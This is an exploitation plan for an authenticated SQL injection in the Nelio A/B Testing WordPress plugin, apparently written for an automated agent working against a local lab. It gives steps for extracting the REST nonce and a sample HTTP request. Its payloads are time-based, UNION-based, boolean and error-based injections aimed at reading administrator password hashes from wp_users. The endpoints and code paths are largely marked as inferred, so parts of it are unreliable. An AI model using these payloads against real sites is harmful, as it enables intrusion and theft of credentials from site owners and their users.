Nelio AB Testing <= 8.2.4 - Authenticated (Editor+) SQL Injection

This research plan outlines the steps to identify and exploit CVE-2026-25378, an authenticated SQL injection vulnerability in the Nelio A/B Testing plugin.

1. Vulnerability Summary

CVE-2026-25378 is a SQL injection vulnerability in the Nelio A/B Testing plugin (versions <= 8.2.4). The flaw resides in the handling of user-supplied parameters within database queries used for reporting or experiment management. The plugin fails to adequately use $wpdb->prepare() or escape inputs, allowing an authenticated user with **Editor** privileges or higher to append arbitrary SQL commands. This can lead to the exfiltration of sensitive data, including administrator password hashes from the wp_users table.

2. Attack Vector Analysis

• Entry Point: Likely a REST API route registered under the nelio-ab-testing/v1 namespace or an AJAX action registered via wp_ajax_.
• Vulnerable Parameter: Parameters related to filtering or sorting experiment data (e.g., id, experiment_id, orderby, or order).
• Authentication: Editor-level account (or higher).
• Preconditions: The plugin must be active, and at least one experiment may need to exist to trigger the relevant query logic.

3. Code Flow (Inferred)

1. Registration: The plugin registers a REST route (e.g., in includes/class-nelio-ab-testing-api.php or includes/nelio-ab-testing-functions.php) with a permission_callback that checks for edit_posts or manage_options.
2. Request Handling: A request is sent to an endpoint like /wp-json/nelio-ab-testing/v1/stats or /wp-json/nelio-ab-testing/v1/get-data.
3. Data Processing: The handler function retrieves parameters from the WP_REST_Request object (e.g., $request->get_param( 'id' )).
4. The Sink: The parameter is concatenated directly into a SQL string or passed to a helper function that builds a query without using $wpdb->prepare().
5. Execution: $wpdb->get_results() is called with the malicious query string.

4. Nonce Acquisition Strategy

The Nelio A/B Testing plugin uses the standard WordPress REST API for its dashboard. To interact with these endpoints, a valid REST API nonce is required in the X-WP-Nonce header.

1. Preparation: Create an Editor user and a page containing the Nelio dashboard scripts.
2. Navigation: Navigate to the Nelio A/B Testing dashboard page (/wp-admin/admin.php?page=nelio-ab-testing-main) while logged in as an Editor.
3. Extraction: The REST nonce is typically localized in the wpApiSettings object.
   • Action: Use browser_eval to extract the nonce:
     browser_eval("window.wpApiSettings?.nonce")
4. Alternative: If the plugin localizes its own settings, check:
   • browser_eval("window.nelioAbTestingSettings?.nonce") (inferred)

5. Exploitation Strategy

We will attempt a Time-Based Blind SQL Injection first, as it is most reliable for data extraction when results might not be directly reflected.

• Endpoint: /wp-json/nelio-ab-testing/v1/stats (inferred - common for reporting plugins).
• Method: GET or POST (depending on route registration).
• Payload (Time-based):
  1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)
• HTTP Request (Example):

  POST /wp-json/nelio-ab-testing/v1/stats
  Host: localhost:8080
  X-WP-Nonce: [EXTRACTED_NONCE]
  Content-Type: application/x-www-form-urlencoded
  
  id=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
  

• Payload (Union-based - if output reflected):
  1' UNION SELECT 1,user_login,user_pass,4,5 FROM wp_users-- -

6. Test Data Setup

1. Install Plugin: Install and activate Nelio A/B Testing version 8.2.4.
2. Create User: Create a user with the editor role.
   • wp user create attacker attacker@example.com --role=editor --user_pass=password
3. Initialize Plugin: Some plugins require a "setup" or a first experiment to populate tables.
   • Use wp post create --post_type=nab_experiment --post_title="Test Experiment" --post_status=publish (inferred post type).
4. Identify Route: Use wp rest route list to find all registered routes under the nelio-ab-testing namespace.

7. Expected Results

• Vulnerability Confirmation: A request with a SLEEP(5) payload should result in a response time significantly greater than 5 seconds.
• Data Exposure: Successful extraction of the user_pass hash for the user with ID = 1 (the administrator).

8. Verification Steps

After the HTTP exploit, verify the database state and the payload's effect:

1. Check SQL execution: If possible, enable the General Query Log in MySQL to see the final rendered query.
2. Verify Admin Hash: Use WP-CLI to get the actual admin hash and compare it with the exfiltrated value.
   • wp user get 1 --field=user_pass

9. Alternative Approaches

• Boolean-based Blind: If time-based is blocked or unstable, compare the response length/status between id=1 AND 1=1 and id=1 AND 1=2.
• Error-based: Inject OR 1=1 or syntax errors (like extractvalue()) to see if the plugin returns $wpdb->last_error in the response.
• AJAX Endpoint: If REST routes are not vulnerable, check admin-ajax.php for registered actions:
  • grep -r "wp_ajax_nelio" .
  • Test actions like nelio_get_stats or nelio_load_experiment.